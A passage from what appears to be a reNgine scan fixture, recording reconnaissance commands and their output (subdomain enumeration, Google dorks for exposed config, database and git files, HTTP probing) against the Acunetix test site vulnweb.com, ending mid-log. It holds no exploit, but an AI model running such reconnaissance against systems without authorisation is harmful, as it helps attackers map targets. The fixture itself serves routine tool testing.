35, + 5, + 17 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.scanactivity", + "pk": 1, + "fields": { + "scan_of": 1, + "title": "Subdomain discovery", + "name": "subdomain_discovery", + "time": "2024-11-13T02:07:31.956Z", + "status": 2, + "error_message": null, + "traceback": null, + "celery_id": "adb7b094-6f28-413b-bf8e-476c27b5e6dd" + } +}, +{ + "model": "startScan.scanactivity", + "pk": 2, + "fields": { + "scan_of": 1, + "title": "OS Intelligence", + "name": "osint", + "time": "2024-11-13T02:04:52.492Z", + "status": 2, + "error_message": null, + "traceback": null, + "celery_id": "621c1e07-7ce0-4476-bc9d-17cb178fa2ae" + } +}, +{ + "model": "startScan.scanactivity", + "pk": 3, + "fields": { + "scan_of": 1, + "title": "Http crawl", + "name": "http_crawl", + "time": "2024-11-13T02:07:30.368Z", + "status": 2, + "error_message": null, + "traceback": null, + "celery_id": null + } +}, +{ + "model": "startScan.scanactivity", + "pk": 4, + "fields": { + "scan_of": 1, + "title": "Port scan", + "name": "port_scan", + "time": "2024-11-13T02:08:14.120Z", + "status": 2, + "error_message": null, + "traceback": null, + "celery_id": "d6ecf5cb-19bb-4ca7-9e06-2cf087298742" + } +}, +{ + "model": "startScan.scanactivity", + "pk": 5, + "fields": { + "scan_of": 1, + "title": "Fetch URL", + "name": "fetch_url", + "time": "2024-11-13T02:34:16.871Z", + "status": 2, + "error_message": null, + "traceback": null, + "celery_id": "fae27562-787c-4c98-9c43-4f9038c61d4a" + } +}, +{ + "model": "startScan.scanactivity", + "pk": 6, + "fields": { + "scan_of": 1, + "title": "Directories & files fuzz", + "name": "dir_file_fuzz", + "time": "2024-11-13T02:40:55.108Z", + "status": 2, + "error_message": null, + "traceback": null, + "celery_id": "427fe2ac-360b-411b-889f-842d9c3eb971" + } +}, +{ + "model": "startScan.scanactivity", + "pk": 7, + "fields": { + "scan_of": 1, + "title": "Vulnerability scan", + "name": "vulnerability_scan", + "time": "2024-11-13T02:56:43.224Z", + "status": 2, + "error_message": null, + "traceback": null, + "celery_id": "7d7a936a-4f2d-4a8f-b42d-f604d6d6ac21" + } +}, +{ + "model": "startScan.scanactivity", + "pk": 8, + "fields": { + "scan_of": 1, + "title": "WAF detection", + "name": "waf_detection", + "time": "2024-11-13T02:34:46.711Z", + "status": 2, + "error_message": null, + "traceback": null, + "celery_id": "c1c4dd2f-6be0-49ed-9a15-08b36c58a896" + } +}, +{ + "model": "startScan.scanactivity", + "pk": 9, + "fields": { + "scan_of": 1, + "title": "Screenshot", + "name": "screenshot", + "time": "2024-11-13T02:34:42.503Z", + "status": 2, + "error_message": null, + "traceback": null, + "celery_id": "370bd224-0baf-4f18-b41e-55c9f17908a4" + } +}, +{ + "model": "startScan.scanactivity", + "pk": 10, + "fields": { + "scan_of": 1, + "title": "Nuclei Scan", + "name": "nuclei_scan", + "time": "2024-11-13T02:56:39.301Z", + "status": 2, + "error_message": null, + "traceback": null, + "celery_id": "6997b1ed-2d9e-4a21-b66f-18fec1066b51" + } +}, +{ + "model": "startScan.scanactivity", + "pk": 11, + "fields": { + "scan_of": 1, + "title": "Nuclei Scan with severity unknown", + "name": "nuclei_individual_severity_module", + "time": "2024-11-13T02:35:29.482Z", + "status": 2, + "error_message": null, + "traceback": null, + "celery_id": "960e4a72-c046-4c80-832f-47ec3413f634" + } +}, +{ + "model": "startScan.scanactivity", + "pk": 12, + "fields": { + "scan_of": 1, + "title": "Nuclei Scan with severity info", + "name": "nuclei_individual_severity_module", + "time": "2024-11-13T02:46:11.173Z", + "status": 2, + "error_message": null, + "traceback": null, + "celery_id": "b2d9eef0-7a2d-442c-9455-9fac73a8631e" + } +}, +{ + "model": "startScan.scanactivity", + "pk": 13, + "fields": { + "scan_of": 1, + "title": "Nuclei Scan with severity low", + "name": "nuclei_individual_severity_module", + "time": "2024-11-13T02:39:32.018Z", + "status": 2, + "error_message": null, + "traceback": null, + "celery_id": "8cc54d6b-efb8-4166-8177-5bd14e2f4e53" + } +}, +{ + "model": "startScan.scanactivity", + "pk": 14, + "fields": { + "scan_of": 1, + "title": "Nuclei Scan with severity high", + "name": "nuclei_individual_severity_module", + "time": "2024-11-13T02:56:38.184Z", + "status": 2, + "error_message": null, + "traceback": null, + "celery_id": "977f8b66-823b-4705-910d-caf20477bc02" + } +}, +{ + "model": "startScan.scanactivity", + "pk": 15, + "fields": { + "scan_of": 1, + "title": "Nuclei Scan with severity medium", + "name": "nuclei_individual_severity_module", + "time": "2024-11-13T02:56:23.030Z", + "status": 2, + "error_message": null, + "traceback": null, + "celery_id": "f4229ccb-8a65-4a0c-8854-752694e90f47" + } +}, +{ + "model": "startScan.scanactivity", + "pk": 16, + "fields": { + "scan_of": 1, + "title": "Nuclei Scan with severity critical", + "name": "nuclei_individual_severity_module", + "time": "2024-11-13T02:38:28.252Z", + "status": 2, + "error_message": null, + "traceback": null, + "celery_id": "8baf541c-f14a-42a5-b7fb-0f332f39e8b9" + } +}, +{ + "model": "startScan.command", + "pk": 1, + "fields": { + "scan_history": 1, + "activity": null, + "command": "httpx -cl -ct -rt -location -td -websocket -cname -asn -cdn -probe -random-agent -t 1 -json -u vulnweb.com -silent", + "return_code": 0, + "output": "{\"timestamp\":\"2024-11-13T02:04:27.170842708Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com\",\"input\":\"vulnweb.com\",\"title\":\"Acunetix Web Vulnerability Scanner - Test websites\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/\",\"time\":\"361.007603ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":482,\"lines\":74,\"status_code\":200,\"content_length\":4018,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n", + "time": "2024-11-13T02:04:15.327Z" + } +}, +{ + "model": "startScan.command", + "pk": 2, + "fields": { + "scan_history": 1, + "activity": null, + "command": "rm /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/httpx_input.txt", + "return_code": 0, + "output": "", + "time": "2024-11-13T02:04:27.290Z" + } +}, +{ + "model": "startScan.command", + "pk": 3, + "fields": { + "scan_history": null, + "activity": null, + "command": "geoiplookup 44.228.249.3", + "return_code": null, + "output": null, + "time": "2024-11-13T02:04:27.259Z" + } +}, +{ + "model": "startScan.command", + "pk": 4, + "fields": { + "scan_history": 1, + "activity": 1, + "command": "subfinder -d vulnweb.com -o /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/subdomains_subfinder.txt -timeout 5 -t 30 -silent", + "return_code": 0, + "output": "\n[\u001b[34mINF\u001b[0m] Current subfinder version v2.6.6 (\u001b[91moutdated\u001b[0m)\nodincovo.vulnweb.com\nblogger.com.vulnweb.com\nu003etestasp.vulnweb.com\ntestphp.vulnweb.com\nantivirus1.vulnweb.com\n2ftestasp.vulnweb.com\ntestpphp.vulnweb.com\ntest.php.vulnweb.com\n2f-2fwww.vulnweb.com\nhttptestaspnet.vulnweb.com\nestphp.vulnweb.com\nvirus.vulnweb.com\n7ctestasp.vulnweb.com\nedu-rost.rutestasp.vulnweb.com\nwww.virus.vulnweb.com\ntetphp.vulnweb.com\nwww.testphp.vulnweb.com\ntestaspx.vulnweb.com\ntestapsnet.vulnweb.com\ntestaps.vulnweb.com\nwww.vulnweb.com\ntest.vulnweb.com\nviruswall.vulnweb.com\nttestphp.vulnweb.com\n5burl-3dhttp-3a-2f-2fwww.vulnweb.com\nwww.test.php.vulnweb.com\nedu-rost.ruwww.vulnweb.com\nu003erest.vulnweb.com\ntesthtml5.vulnweb.com\ntestaspnet.vulnweb.com\nrestasp.vulnweb.com\ntestap.vulnweb.com\nwww.testasp.vulnweb.com\n2fwww.vulnweb.com\ntestasp.vulnweb.com\nrest.vulnweb.com", + "time": "2024-11-13T02:04:27.438Z" + } +}, +{ + "model": "startScan.command", + "pk": 5, + "fields": { + "scan_history": 1, + "activity": null, + "command": "GooFuzz -t vulnweb.com -d 3 -p 5 -w /login/,login.html -o /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/gofuzz.txt", + "return_code": 1, + "output": "\n*********************************************************\n* GooFuzz 1.2.5 - The Power of Google Dorks\t\t*\n*********************************************************\n\nTarget: \u001b[1mvulnweb.com\u001b[0m\n\nSorry, no results found.", + "time": "2024-11-13T02:04:27.607Z" + } +}, +{ + "model": "startScan.command", + "pk": 6, + "fields": { + "scan_history": 1, + "activity": null, + "command": "GooFuzz -t vulnweb.com -d 3 -p 5 -w /admin/,admin.html -o /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/gofuzz.txt", + "return_code": 1, + "output": "\n*********************************************************\n* GooFuzz 1.2.5 - The Power of Google Dorks\t\t*\n*********************************************************\n\nTarget: \u001b[1mvulnweb.com\u001b[0m\n\nSorry, no results found.", + "time": "2024-11-13T02:04:27.940Z" + } +}, +{ + "model": "startScan.command", + "pk": 7, + "fields": { + "scan_history": 1, + "activity": null, + "command": "GooFuzz -t vulnweb.com -d 3 -p 5 -w /dashboard/,dashboard.html -o /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/gofuzz.txt", + "return_code": 1, + "output": "\n*********************************************************\n* GooFuzz 1.2.5 - The Power of Google Dorks\t\t*\n*********************************************************\n\nTarget: \u001b[1mvulnweb.com\u001b[0m\n\nSorry, no results found.", + "time": "2024-11-13T02:04:28.262Z" + } +}, +{ + "model": "startScan.command", + "pk": 8, + "fields": { + "scan_history": 1, + "activity": null, + "command": "GooFuzz -t stackoverflow.com -d 3 -p 2 -w vulnweb.com -o /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/gofuzz.txt", + "return_code": 1, + "output": "\n*********************************************************\n* GooFuzz 1.2.5 - The Power of Google Dorks\t\t*\n*********************************************************\n\nTarget: \u001b[1mstackoverflow.com\u001b[0m\n\nSorry, no results found.", + "time": "2024-11-13T02:04:28.651Z" + } +}, +{ + "model": "startScan.command", + "pk": 9, + "fields": { + "scan_history": 1, + "activity": 1, + "command": "ctfr -d vulnweb.com -o /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/subdomains_ctfr.txt && cat /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/subdomains_ctfr.txt | sed 's/\\*.//g' | tail -n +12 | uniq | sort > /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/subdomains_ctfr.txt", + "return_code": 0, + "output": "\n\n____ _____ _____ ____\n/ ___|_ _| ___| _ \\\n| | | | | |_ | |_) |\n| |___ | | | _| | _ <\n\\____| |_| |_| |_| \\_\\\n\nVersion 1.2 - Hey don't miss AXFR!\nMade by Sheila A. Berta (UnaPibaGeek)\n\n\n[!] ---- TARGET: vulnweb.com ---- [!]\n\n\n\n[!] Done. Have a nice day! ;).", + "time": "2024-11-13T02:04:28.927Z" + } +}, +{ + "model": "startScan.command", + "pk": 10, + "fields": { + "scan_history": 1, + "activity": null, + "command": "GooFuzz -t tiktok.com -d 3 -p 2 -w vulnweb.com -o /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/gofuzz.txt", + "return_code": 1, + "output": "\n*********************************************************\n* GooFuzz 1.2.5 - The Power of Google Dorks\t\t*\n*********************************************************\n\nTarget: \u001b[1mtiktok.com\u001b[0m\n\nSorry, no results found.", + "time": "2024-11-13T02:04:28.993Z" + } +}, +{ + "model": "startScan.command", + "pk": 11, + "fields": { + "scan_history": 1, + "activity": null, + "command": "GooFuzz -t facebook.com -d 3 -p 2 -w vulnweb.com -o /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/gofuzz.txt", + "return_code": 1, + "output": "\n*********************************************************\n* GooFuzz 1.2.5 - The Power of Google Dorks\t\t*\n*********************************************************\n\nTarget: \u001b[1mfacebook.com\u001b[0m\n\nSorry, no results found.", + "time": "2024-11-13T02:04:29.404Z" + } +}, +{ + "model": "startScan.command", + "pk": 12, + "fields": { + "scan_history": 1, + "activity": null, + "command": "GooFuzz -t twitter.com -d 3 -p 2 -w vulnweb.com -o /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/gofuzz.txt", + "return_code": 1, + "output": "\n*********************************************************\n* GooFuzz 1.2.5 - The Power of Google Dorks\t\t*\n*********************************************************\n\nTarget: \u001b[1mtwitter.com\u001b[0m\n\nSorry, no results found.", + "time": "2024-11-13T02:04:29.799Z" + } +}, +{ + "model": "startScan.command", + "pk": 13, + "fields": { + "scan_history": 1, + "activity": 1, + "command": "sublist3r -d vulnweb.com -t 30 -o /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/subdomains_sublister.txt", + "return_code": 0, + "output": "\n\u001b[91m\n____ _ _ _ _ _____\n/ ___| _ _| |__ | (_)___| |_|___ / _ __\n\\___ \\| | | | '_ \\| | / __| __| |_ \\| '__|\n___) | |_| | |_) | | \\__ \\ |_ ___) | |\n|____/ \\__,_|_.__/|_|_|___/\\__|____/|_|\u001b[0m\u001b[93m\n\n# Coded By Ahmed Aboul-Ela - @aboul3la\n\n\u001b[94m[-] Enumerating subdomains now for vulnweb.com\u001b[0m\n\u001b[92m[-] Searching now in Baidu..\u001b[0m\n\u001b[92m[-] Searching now in Yahoo..\u001b[0m\n\u001b[92m[-] Searching now in Google..\u001b[0m\n\u001b[92m[-] Searching now in Bing..\u001b[0m\n\u001b[92m[-] Searching now in Ask..\u001b[0m\n\u001b[92m[-] Searching now in Netcraft..\u001b[0m\n\u001b[92m[-] Searching now in DNSdumpster..\u001b[0m\n\u001b[92m[-] Searching now in Virustotal..\u001b[0m\n\u001b[92m[-] Searching now in ThreatCrowd..\u001b[0m\n\u001b[92m[-] Searching now in SSL Certificates..\u001b[0m\n\u001b[92m[-] Searching now in PassiveDNS..\u001b[0m\n\u001b[91m[!] Error: Virustotal probably now is blocking our requests\u001b[0m", + "time": "2024-11-13T02:04:29.871Z" + } +}, +{ + "model": "startScan.command", + "pk": 14, + "fields": { + "scan_history": 1, + "activity": null, + "command": "GooFuzz -t youtube.com -d 3 -p 2 -w vulnweb.com -o /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/gofuzz.txt", + "return_code": 1, + "output": "\n*********************************************************\n* GooFuzz 1.2.5 - The Power of Google Dorks\t\t*\n*********************************************************\n\nTarget: \u001b[1myoutube.com\u001b[0m\n\nSorry, no results found.", + "time": "2024-11-13T02:04:30.185Z" + } +}, +{ + "model": "startScan.command", + "pk": 15, + "fields": { + "scan_history": 1, + "activity": null, + "command": "GooFuzz -t reddit.com -d 3 -p 2 -w vulnweb.com -o /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/gofuzz.txt", + "return_code": 1, + "output": "\n*********************************************************\n* GooFuzz 1.2.5 - The Power of Google Dorks\t\t*\n*********************************************************\n\nTarget: \u001b[1mreddit.com\u001b[0m\n\nSorry, no results found.", + "time": "2024-11-13T02:04:30.633Z" + } +}, +{ + "model": "startScan.command", + "pk": 16, + "fields": { + "scan_history": 1, + "activity": null, + "command": "GooFuzz -t trello.com -d 3 -p 2 -w vulnweb.com -o /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/gofuzz.txt", + "return_code": 1, + "output": "\n*********************************************************\n* GooFuzz 1.2.5 - The Power of Google Dorks\t\t*\n*********************************************************\n\nTarget: \u001b[1mtrello.com\u001b[0m\n\nSorry, no results found.", + "time": "2024-11-13T02:04:31.024Z" + } +}, +{ + "model": "startScan.command", + "pk": 17, + "fields": { + "scan_history": 1, + "activity": null, + "command": "GooFuzz -t atlassian.net -d 3 -p 2 -w vulnweb.com -o /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/gofuzz.txt", + "return_code": 1, + "output": "\n*********************************************************\n* GooFuzz 1.2.5 - The Power of Google Dorks\t\t*\n*********************************************************\n\nTarget: \u001b[1matlassian.net\u001b[0m\n\nSorry, no results found.", + "time": "2024-11-13T02:04:31.403Z" + } +}, +{ + "model": "startScan.command", + "pk": 18, + "fields": { + "scan_history": 1, + "activity": null, + "command": "GooFuzz -t github.com -d 3 -p 2 -w vulnweb.com -o /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/gofuzz.txt", + "return_code": 1, + "output": "\n*********************************************************\n* GooFuzz 1.2.5 - The Power of Google Dorks\t\t*\n*********************************************************\n\nTarget: \u001b[1mgithub.com\u001b[0m\n\nSorry, no results found.", + "time": "2024-11-13T02:04:31.738Z" + } +}, +{ + "model": "startScan.command", + "pk": 19, + "fields": { + "scan_history": 1, + "activity": null, + "command": "GooFuzz -t gitlab.com -d 3 -p 2 -w vulnweb.com -o /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/gofuzz.txt", + "return_code": 1, + "output": "\n*********************************************************\n* GooFuzz 1.2.5 - The Power of Google Dorks\t\t*\n*********************************************************\n\nTarget: \u001b[1mgitlab.com\u001b[0m\n\nSorry, no results found.", + "time": "2024-11-13T02:04:32.127Z" + } +}, +{ + "model": "startScan.command", + "pk": 20, + "fields": { + "scan_history": 1, + "activity": null, + "command": "GooFuzz -t bitbucket.org -d 3 -p 2 -w vulnweb.com -o /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/gofuzz.txt", + "return_code": 1, + "output": "\n*********************************************************\n* GooFuzz 1.2.5 - The Power of Google Dorks\t\t*\n*********************************************************\n\nTarget: \u001b[1mbitbucket.org\u001b[0m\n\nSorry, no results found.", + "time": "2024-11-13T02:04:32.333Z" + } +}, +{ + "model": "startScan.command", + "pk": 21, + "fields": { + "scan_history": 1, + "activity": null, + "command": "GooFuzz -t vulnweb.com -d 3 -p 4 -e env,xml,conf,toml,yml,yaml,cnf,inf,rdp,ora,txt,cfg,ini -o /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/gofuzz.txt", + "return_code": 1, + "output": "\n*********************************************************\n* GooFuzz 1.2.5 - The Power of Google Dorks\t\t*\n*********************************************************\n\nTarget: \u001b[1mvulnweb.com\u001b[0m\n\nSorry, no results found for \u001b[1menv\u001b[0m.\n\n===================================================================\nExtension: \u001b[1mxml\u001b[0m\n===================================================================\n\nhttp://testphp.vulnweb.com/.idea/misc.xml\nhttp://testphp.vulnweb.com/.idea/workspace.xml\nhttp://testphp.vulnweb.com/crossdomain.xml\n\nSorry, no results found for \u001b[1mconf\u001b[0m.\n\nSorry, no results found for \u001b[1mtoml\u001b[0m.\n\nSorry, no results found for \u001b[1myml\u001b[0m.\n\nSorry, no results found for \u001b[1myaml\u001b[0m.\n\nSorry, no results found for \u001b[1mcnf\u001b[0m.\n\nSorry, no results found for \u001b[1minf\u001b[0m.\n\nSorry, no results found for \u001b[1mrdp\u001b[0m.\n\nSorry, no results found for \u001b[1mora\u001b[0m.\n\n===================================================================\nExtension: \u001b[1mtxt\u001b[0m\n===================================================================\n\nhttp://testphp.vulnweb.com/pictures/ipaddresses.txt\n\nSorry, no results found for \u001b[1mcfg\u001b[0m.\n\nSorry, no results found for \u001b[1mini\u001b[0m.", + "time": "2024-11-13T02:04:32.709Z" + } +}, +{ + "model": "startScan.command", + "pk": 22, + "fields": { + "scan_history": 1, + "activity": 1, + "command": "tlsx -san -cn -silent -ro -host vulnweb.com | sed -n '/^\\([a-zA-Z0-9]\\([-a-zA-Z0-9]*[a-zA-Z0-9]\\)\\?\\.\\)\\+vulnweb.com$/p' | uniq | sort > /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/subdomains_tlsx.txt", + "return_code": 0, + "output": "", + "time": "2024-11-13T02:04:43.805Z" + } +}, +{ + "model": "startScan.command", + "pk": 23, + "fields": { + "scan_history": 1, + "activity": null, + "command": "GooFuzz -t vulnweb.com -d 3 -p 1 -w Jenkins -o /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/gofuzz.txt", + "return_code": 1, + "output": "\n*********************************************************\n* GooFuzz 1.2.5 - The Power of Google Dorks\t\t*\n*********************************************************\n\nTarget: \u001b[1mvulnweb.com\u001b[0m\n\nSorry, no results found.", + "time": "2024-11-13T02:04:44.361Z" + } +}, +{ + "model": "startScan.command", + "pk": 24, + "fields": { + "scan_history": 1, + "activity": null, + "command": "GooFuzz -t vulnweb.com -d 3 -p 5 -w /wp-content/,/wp-includes/ -o /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/gofuzz.txt", + "return_code": 1, + "output": "\n*********************************************************\n* GooFuzz 1.2.5 - The Power of Google Dorks\t\t*\n*********************************************************\n\nTarget: \u001b[1mvulnweb.com\u001b[0m\n\nSorry, no results found.", + "time": "2024-11-13T02:04:44.658Z" + } +}, +{ + "model": "startScan.command", + "pk": 25, + "fields": { + "scan_history": 1, + "activity": null, + "command": "GooFuzz -t vulnweb.com -d 3 -p 5 -w PHP Parse error,PHP Warning,PHP Error -o /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/gofuzz.txt", + "return_code": 1, + "output": "\n*********************************************************\n* GooFuzz 1.2.5 - The Power of Google Dorks\t\t*\n*********************************************************\n\nTarget: \u001b[1mvulnweb.com\u001b[0m\n\nSorry, no results found.", + "time": "2024-11-13T02:04:44.946Z" + } +}, +{ + "model": "startScan.command", + "pk": 26, + "fields": { + "scan_history": 1, + "activity": null, + "command": "GooFuzz -t vulnweb.com -d 3 -p 7 -e doc,docx,odt,pdf,rtf,sxw,psw,ppt,pptx,pps,csv -o /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/gofuzz.txt", + "return_code": 1, + "output": "\n*********************************************************\n* GooFuzz 1.2.5 - The Power of Google Dorks\t\t*\n*********************************************************\n\nTarget: \u001b[1mvulnweb.com\u001b[0m\n\nSorry, no results found for \u001b[1mdoc\u001b[0m.\n\nSorry, no results found for \u001b[1mdocx\u001b[0m.\n\nSorry, no results found for \u001b[1modt\u001b[0m.\n\nSorry, no results found for \u001b[1mpdf\u001b[0m.\n\nSorry, no results found for \u001b[1mrtf\u001b[0m.\n\nSorry, no results found for \u001b[1msxw\u001b[0m.\n\nSorry, no results found for \u001b[1mpsw\u001b[0m.\n\nSorry, no results found for \u001b[1mppt\u001b[0m.\n\nSorry, no results found for \u001b[1mpptx\u001b[0m.\n\nSorry, no results found for \u001b[1mpps\u001b[0m.\n\nSorry, no results found for \u001b[1mcsv\u001b[0m.", + "time": "2024-11-13T02:04:45.253Z" + } +}, +{ + "model": "startScan.command", + "pk": 27, + "fields": { + "scan_history": 1, + "activity": null, + "command": "GooFuzz -t vulnweb.com -d 3 -p 1 -e sql,db,dbf,mdb -o /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/gofuzz.txt", + "return_code": 1, + "output": "\n*********************************************************\n* GooFuzz 1.2.5 - The Power of Google Dorks\t\t*\n*********************************************************\n\nTarget: \u001b[1mvulnweb.com\u001b[0m\n\nSorry, no results found for \u001b[1msql\u001b[0m.\n\nSorry, no results found for \u001b[1mdb\u001b[0m.\n\nSorry, no results found for \u001b[1mdbf\u001b[0m.\n\nSorry, no results found for \u001b[1mmdb\u001b[0m.", + "time": "2024-11-13T02:04:50.201Z" + } +}, +{ + "model": "startScan.command", + "pk": 28, + "fields": { + "scan_history": 1, + "activity": null, + "command": "GooFuzz -t vulnweb.com -d 3 -p 1 -e git -o /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/gofuzz.txt", + "return_code": 1, + "output": "\n*********************************************************\n* GooFuzz 1.2.5 - The Power of Google Dorks\t\t*\n*********************************************************\n\nTarget: \u001b[1mvulnweb.com\u001b[0m\n\nSorry, no results found for \u001b[1mgit\u001b[0m.", + "time": "2024-11-13T02:04:52.011Z" + } +}, +{ + "model": "startScan.command", + "pk": 29, + "fields": { + "scan_history": 1, + "activity": 1, + "command": "oneforall --target vulnweb.com run && cut -d',' -f6 /home/rengine/tools/.github/OneForAll/results/vulnweb.com.csv | tail -n +2 > /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/subdomains_oneforall.txt && rm -rf /home/rengine/tools/.github/OneForAll/results/vulnweb.com.csv", + "return_code": 0, + "output": "\n\nOneForAll is a powerful subdomain integration tool\u001b[01;33m\n___ _ _\n___ ___ ___| _|___ ___ ___| | | \u001b[01;37m{\u001b[1;31mv0.4.5 #dev\u001b[01;37m}\u001b[01;32m\n| . | | -_| _| . | _| .'| | | \u001b[01;34m\n|___|_|_|___|_| |___|_| |__,|_|_| \u001b[01;37mgit.io/fjHT1\n\n\u001b[1;31mOneForAll is under development, please update before each use!\u001b[0m\n\n[*] Starting OneForAll @ 2024-11-13 02:05:15\n\n02:05:15,783 [INFOR] utils:532 - Checking dependent environment\n02:05:15,783 [INFOR] utils:544 - Checking network environment\n02:05:17,177 [INFOR] utils:555 - Checking for the latest version\n02:05:17,504 [INFOR] utils:579 - The current version v0.4.5 is already the latest version\n02:05:17,506 [INFOR] oneforall:241 - Start running OneForAll\n02:05:17,508 [INFOR] oneforall:246 - Got 1 domains\n02:05:17,555 [INFOR] wildcard:108 - Detecting vulnweb.com use wildcard dns record or not\n02:05:17,587 [ALERT] wildcard:47 - f7043b28.vulnweb.com resolve to: f7043b28.vulnweb.com. IP: {'44.228.249.3'} TTL: 3600\n02:05:17,616 [ALERT] wildcard:47 - 121f8ec1.vulnweb.com resolve to: 121f8ec1.vulnweb.com. IP: {'44.228.249.3'} TTL: 3600\n02:05:17,642 [ALERT] wildcard:47 - b8995b70.vulnweb.com resolve to: b8995b70.vulnweb.com. IP: {'44.228.249.3'} TTL: 3600\n02:05:17,642 [INFOR] utils:700 - Attempting to request http://f7043b28.vulnweb.com\n02:05:18,028 [ALERT] utils:708 - Error request http://f7043b28.vulnweb.com\n02:05:18,028 [INFOR] utils:700 - Attempting to request http://121f8ec1.vulnweb.com\n02:05:18,418 [ALERT] utils:708 - Error request http://121f8ec1.vulnweb.com\n02:05:18,418 [INFOR] utils:700 - Attempting to request http://b8995b70.vulnweb.com\n02:05:18,813 [ALERT] utils:708 - Error request http://b8995b70.vulnweb.com\n02:05:18,813 [ALERT] wildcard:121 - The domain vulnweb.com enables wildcard\n02:05:18,813 [INFOR] collect:44 - Start collecting subdomains of vulnweb.com\n02:05:18,904 [INFOR] module:63 - AXFRCheck module took 0.0 seconds found 0 subdomains\n02:05:18,923 [INFOR] module:63 - NSECCheck module took 0.0 seconds found 0 subdomains\n02:05:18,971 [INFOR] module:63 - QuerySOA module took 0.0 seconds found 0 subdomains\n02:05:18,973 [INFOR] module:63 - QueryNS module took 0.0 seconds found 0 subdomains\n02:05:19,008 [INFOR] module:63 - QuerySPF module took 0.1 seconds found 0 subdomains\n02:05:19,010 [INFOR] module:63 - QueryMX module took 0.1 seconds found 0 subdomains\n02:05:19,048 [ERROR] module:129 - HTTPSConnectionPool(host='riddler.io', port=443): Max retries exceeded with url: /search?q=pld%3Avulnweb.com (Caused by NewConnectionError(': Failed to establish a new connection: [Errno -5] No address associated with hostname'))\n02:05:19,049 [INFOR] module:63 - RiddlerQuery module took 0.1 seconds found 0 subdomains\n02:05:19,479 [INFOR] module:63 - CSPCheck module took 0.6 seconds found 0 subdomains\n02:05:19,516 [INFOR] module:63 - CertSpotterQuery module took 0.7 seconds found 0 subdomains\n02:05:19,519 [INFOR] module:63 - CrtshQuery module took 0.7 seconds found 0 subdomains\n02:05:19,521 [INFOR] module:63 - QueryTXT module took 0.6 seconds found 0 subdomains\n02:05:19,522 [ALERT] utils:273 - GET https://fullhunt.io/api/v1/domain/vulnweb.com/subdomains 401 - UNAUTHORIZED 50\n02:05:19,524 [ALERT] utils:273 - GET https://urlscan.io/api/v1/search/?q=domain%3Avulnweb.com 429 - Too Many Requests 564\n02:05:19,527 [ALERT] utils:282 - {'message': 'Unauthorized access', 'success': False}\n02:05:19,562 [INFOR] module:63 - SiteDossierQuery module took 0.6 seconds found 4 subdomains\n02:05:19,565 [ALERT] utils:273 - GET https://www.dnsgrep.cn/subdomain/vulnweb.com 403 - Forbidden 8846\n02:05:19,598 [INFOR] module:63 - ThreatMinerQuery module took 0.5 seconds found 0 subdomains\n02:05:19,606 [INFOR] module:63 - UrlscanQuery module took 0.7 seconds found 0 subdomains\n02:05:19,609 [INFOR] module:63 - FullHuntAPIQuery module took 0.7 seconds found 0 subdomains\n02:05:19,611 [INFOR] module:63 - DnsgrepQuery module took 0.7 seconds found 0 subdomains\n02:05:19,723 [ALERT] utils:273 - GET https://www.virustotal.com/ui/domains/vulnweb.com/subdomains?limit=40&cursor= 429 - Too Many Requests 153\n02:05:19,755 [INFOR] module:63 - AnubisQuery module took 0.9 seconds found 12 subdomains\n02:05:19,758 [INFOR] module:63 - HackerTargetQuery module took 0.8 seconds found 22 subdomains\n02:05:19,759 [ALERT] utils:282 - {'error': {'code': 'RecaptchaRequiredError', 'message': 'Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header'}}\n02:05:19,764 [INFOR] module:63 - VirusTotalQuery module took 